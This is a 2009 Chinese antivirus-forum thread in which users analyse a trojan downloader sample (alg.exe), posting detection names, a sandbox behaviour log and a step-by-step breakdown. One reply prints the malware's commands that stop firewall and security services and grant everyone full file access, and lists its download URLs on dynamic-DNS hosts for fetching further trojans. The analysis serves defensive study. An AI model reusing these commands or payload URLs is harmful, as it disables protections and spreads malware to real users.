楼主: henmy168
收起左侧

[病毒样本] 贯穿于整个远景论坛长达几天之久的病毒样本

[复制链接]
htm123
发表于 2009-9-2 10:39:59 | 显示全部楼层
您查询的IP:121.12.116.67
本站主数据:广东省东莞市 电信IDC机房
参考数据一:广东省东莞市 电信
参考数据二:广东省东莞市 电信
kkgh
发表于 2009-9-2 10:42:17 | 显示全部楼层
瑞星 Trojan.Win32.KillAV.bwg
冰比冰水冰 该用户已被删除
发表于 2009-9-2 10:47:24 | 显示全部楼层
话说这个文件运行后是不是得等老长时间啊。。。。
我以外它休眠了,等了老长时间终于看到它又活动了
Win32 API 挂钩
VirtualProtect(alg.exe) from Z:\Temp\alg.exe

创建文件
C:\WINDOWS\system32\aa333234t.dll

未知进程启动
C:\WINDOWS\system32\aa333234t.dll

删除并重新创建文件
C:\WINDOWS\system32\drivers\asyncmac.sys

安装服务
RAS Asynchronous Media Driver

启动服务
RAS Asynchronous Media Driver

创建注册表项
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\*.*

删除并重新创建注册表项
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


创建并启动进程
C:\WINDOWS\aa673406.exe

设置注册表项值
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\360Soft

进程启动
C:\WINDOWS\system32\net1.exe

控制服务
Windows Firewall/Internet Connection Sharing (ICS)

删除服务及文件
pcidump

创建文件
C:\WINDOWS\system32\scvhost.exe

创建文件
C:\Documents and Settings\Administrator\Local Settings\Temp\_uok.bat


主要动作就是这些~
失落的手链
发表于 2009-9-2 10:57:59 | 显示全部楼层
瑞星2010
Trojan.Win32.KillAV.bwg
lm91128
头像被屏蔽
发表于 2009-9-2 11:18:08 | 显示全部楼层

回复 11楼 lorchid 的帖子

规则好有意思。。。。
jason_jiang
发表于 2009-9-2 11:54:19 | 显示全部楼层
汗,动作真多
http://www.threatexpert.com/repo ... 7c632532a72a17deae4

[ 本帖最后由 jason_jiang 于 2009-9-2 12:11 编辑 ]
板砖飞向我
发表于 2009-9-2 12:09:25 | 显示全部楼层
无法返回请求的网页

试图访问的网页:

http://bbs.kafan.cn/attachment.php?aid=
615628&k=1dc941ba6c255aa07337830ebffbae9
d&t=1251864529

被以下病毒感染:Trojan-Downloader.Win32.Geral.cua
promised
发表于 2009-9-2 13:03:50 | 显示全部楼层
一个已经出来了很长时间的downloader,这一变种貌似功能有所减少

alg.exe
1.释放a%s%dt.dll(随机文件名)至%windir%\system32目录下
2.调用rundll32.dll加载a%s%dt.dll
3.释放a%s%d.exe(随机文件名)至%windir%目录下并运行
4.释放pcidump.sys至%windir%\system32\drivers目录下并加载之
5.复制自身至%windir%\system32\scvhost.exe
6.设置启动项值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]360Soft = "%System%\scvhost.exe"

a%s%dt.dll
1.释放AsyncMac.sys,aec.sys 至%windir%\system32\drivers目录下并加载之
2.重定向劫持杀毒软件程序(18楼已列举)
3.调用cmd /c sc config停止瑞星,kav,nod32,金山等杀毒软件服务
4.调用taskkill关闭kav,金山,nod32等杀毒软件进程
5.清空SOFTWARE\Microsoft\Windows\CurrentVersion\Run项

a%s%d.exe
1.调用cmd
cmd /c cacls "%s" /e /p everyone:f
cmd /c net stop wscsvc
cmd /c net stop SharedAccess
cmd /c sc config sharedaccess start= disabled
2.从http://5662218896.9966.org/net/count.asp?mac=001190a830d1&ver=2009-9-1zr&os=&dtime=2009-9-1获取列表url=http://554313.3322.org/net.txt
1:http://5435646.2288.org/xx1.exe
1:http://5435646.2288.org/xx2.exe
1:http://5435646.2288.org/xx3.exe
1:http://5435646.2288.org/xx4.exe
1:http://5435646.2288.org/xx5.exe
1:http://5435646.2288.org/xx6.exe
1:http://5435646.2288.org/xx7.exe
1:http://5435646.2288.org/xx8.exe
1:http://5435646.2288.org/xx9.exe
1:http://5435646.2288.org/xx10.exe
1:http://5435646.2288.org/xx11.exe
1:http://5435646.2288.org/xx12.exe
1:http://5435646.2288.org/xx13.exe
1:http://5435646.2288.org/xx14.exe
1:http://5435646.2288.org/xx15.exe
1:http://5435646.2288.org/xx16.exe
1:http://5435646.2288.org/xx17.exe
1:http://5435646.2288.org/xx18.exe
1:http://5435646.2288.org/xx19.exe
1:http://5435646.2288.org/xx20.exe
1:http://5435646.2288.org/xx22.exe
1:http://5435646.2288.org/xx24.exe
1:http://5435646.2288.org/xx25.exe

3.下载木马群并运行之

对于驱动本人能力不足,只能参考下,有些驱动加载了后来又卸载了
AsyncMac.sys
用来killav的驱动
aec.sys
恢复ssdt的驱动
pcidump.sys
穿还原
capsshift
发表于 2009-9-2 14:53:02 | 显示全部楼层
Starting the file scan:

Begin scan in 'D:\DOWNLOADS\alg.rar'
D:\DOWNLOADS\alg.rar
  [0] Archive type: RAR
    --> alg.exe
      [DETECTION] Contains a recognition pattern of the (harmful) BDS/Backdoor.Gen back-door program

Beginning disinfection:
D:\DOWNLOADS\alg.rar
    [NOTE]      The file was moved to '4b05162a.qua'!
barbara
发表于 2009-9-2 15:56:09 | 显示全部楼层
飞塔MISS。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 13:32 , Processed in 0.076554 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表